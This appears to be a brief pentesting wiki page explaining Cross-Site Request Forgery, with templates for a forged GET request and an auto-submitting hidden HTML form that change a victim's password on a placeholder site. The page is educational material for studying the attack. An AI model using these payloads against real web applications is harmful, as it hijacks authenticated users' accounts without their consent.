CSRF
Cross Site Request Forgery (CSRF)
Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they’re currently authenticated. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker’s choosing.
Overview and Prerequisites
Valuable Action: One needs to find an action that is worth exploiting, such as, changing user information.
Session: The user's session must only be managed by a cookie.
Exploitation
Both methods mentioned below can be distributed via social engineering
GET
This is a normal request to change a user's (
acc
) password (new_pass
) on a platformGET http://domain.com/action/?acc=test&new_pass=password123
To exploit this and change the password of the victim, one can do this:
GET http://domain.com//action/?acc=victim&new_pass=newpassword123
POST
Basic request to change password
POST http://domain.com/action/ acc=test&new_pass=password123
To exploit it, one needs to create a fake form which points to the URL that the they need with the attributes needed
<form action="http://domain.com/action/" method="POST"> <input type="hidden" name="acc" value="victim"/> <input type="hidden" name="new_pass" value="newpassword123"/> <input type="submit" value="THIS IS A CSRF ATTEMPT"/> </form>
Since the form needs to be sent, one can just make add an autosubmit functionality to the page:
<body onload="document.forms[0].submit()">
References
Last updated